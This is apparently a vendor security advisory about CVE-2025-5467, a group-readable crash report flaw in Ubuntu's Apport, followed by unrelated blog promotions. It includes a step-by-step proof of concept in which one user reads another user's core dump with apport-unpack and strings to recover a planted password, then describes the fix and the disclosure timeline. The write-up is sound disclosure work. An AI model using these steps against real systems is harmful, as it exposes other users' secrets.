Stratascale’s Cybersecurity Research Unit (CRU) discovered an information disclosure vulnerability in Ubuntu’s Apport crash reporting system (CVE-2025-5467). Improper file permissions allowed users in the same group to access sensitive crash data. Ubuntu has released a fix, update now to stay secure.
Apport is Ubuntu’s crash reporting system. Apport intercepts program crashes, collects debugging information about the crash and the operating system environment, and sends it to bug trackers in a standardized form. It also allows users to report bugs in packages, once again collecting as much relevant information as possible. Source: https://launchpad.net/apport/
The Stratascale Cyber Research Unit (CRU) team discovered an insecure permissions vulnerability in Apport, leading to limited information disclosure.
Apport stores crash reports in a central location – /var/crash. When a process crashes, Apport automatically creates a crash report file that is written to /var/crash which contains various technical details, including the raw base64 encoded core dump. A core file, which represents the memory of the application at the time of the crash, could potentially include sensitive data such as passwords and encryption keys.
The issue is that the report file has group read permissions by default, and the group is set to the user’s primary group. Any user who is a member of the same primary group can read the crash reports of another user, which could lead to the disclosure of sensitive information.
This vulnerability was found while troubleshooting an unrelated issue. During crash testing, we noticed that the crash file produced by the Apport program had overly permissive permissions, which led us to investigate further.
Ubuntu 24.04.2 LTS
apport 2.28.1-0ubuntu3.5
Create two users with the primary group set to staff. For this PoC, the following users are used.
root@apport-test:~# id user1
uid=1001(user1) gid=50(staff) groups=50(staff)
root@apport-test:~# id user2
uid=1002(user2) gid=50(staff) groups=50(staff)
As user1, execute bash, and then export the PGPASSWD variable to the string UberSecret. Send the SIGABRT signal to the bash process to induce a crash.
user1@apport-test:~$ bash
user1@apport-test:~$ export PGPASSWD=UberSecret
user1@apport-test:~$ kill -ABRT $$
Aborted (core dumped)
Verify the crash report was written to /var/crash/_usr_bin_bash..crash. Note the staff group permissions have read access.
drwxr-xr-x 13 root root 4096 Jul 2 2024 ..
drwxrwsrwt 2 root root 4096 Apr 6 09:58 .
-rw-r----- 1 user1 staff 97412 Apr 6 09:58 _usr_bin_bash.1001.crash
As user2 executes the apport-unpack program to unpack the crash report to /tmp/unpacked.
user2@apport-test:~$ apport-unpack /var/crash/_usr_bin_bash.1001.crash \ /tmp/unpacked
As user2 executes the following strings command to search the CoreDump file for the PGPASSWD environment variable value. The user2 is able to read sensitive data associated with a crash for a process executed by user1.
user2@apport-test:~$ strings /tmp/unpacked/CoreDump |grep -w PGPASSWD
PGPASSWD
PGPASSWD
export PGPASSWD=UberSecret
The issue was fixed in commit a9b3a6 by setting the group argument to -1 in the os.fchown(), which ensures that group permissions do not get altered.
After the fix, the group permissions for Apport crash reports will not change the group permissions. For systems without the whoopsie package, root will retain group read permission; otherwise, the whoopsie group will have read permission. The group is set by the setgid bit in the /var/crash folder.
lowpriv@apport-test:~$ bash
lowpriv@apport-test:~$ kill -ABRT $$
Aborted (core dumped)
lowpriv@apport-test:~$ ls -ld /var/crash/_usr_bin_bash.1001.crash
-rw-r----- 1 lowpriv root 357074 Jun 10 13:23 /var/crash/_usr_bin_bash.1001.crash
04/06/2025: Vulnerability report submitted to Launchpad.
04/06/2025: Report acknowledged; initial discussion began.
04/09/2025: Maintainer proposed a patch.
05/16/2025: Follow-up request for an update.
05/17/2025: Maintainer responded; issue to be bundled with bug #2107472.
05/29/2025: Follow-up after v2.33.0 release mentioned other security fixes.
06/02/2025: Maintainer clarified issue was mistakenly excluded; CVE to be requested.
06/06/2025: Public disclosure; CVE-2025-5467 assigned.
06/12/2025: Blog post published.
The CVE-2025-5467 Ubuntu Apport Insecure File Permissions vulnerability was discovered and reported to Ubuntu by Rich Mirch of the Stratascale Cyber Research Unit.
Practical Guidance & Threat Intelligence
Stay a step ahead of the competition–and attackers–with fresh perspectives, practical guidance, and the latest threat intelligence.
To strengthen threat detection and accelerate compliance efforts, tool sprawl needs to be kept under control. Here are four steps to optimize your security tools and combat technology sprawl.
Learn how explainability, governance, and auditability in agentic AI systems help ensure safe, ethical, and accountable deployment while keeping innovation on track.
Our team shares key takeaways from Black Hat 2025, including why foundational security practices, AI governance, and insider threat management are more critical than ever for building resilience and aligning cybersecurity with business strategy.
As work becomes more distributed, securing access without slowing productivity is essential. Learn how modern access browsers deliver enterprise-grade protection with a seamless user experience.
As cyber threats evolve, guarding your organizational data becomes increasingly important. Discover tactical ways to build AI-era protection for sensitive information.
To strengthen threat detection and accelerate compliance efforts, tool sprawl needs to be kept under control. Here are four steps to optimize your security tools and combat technology sprawl.
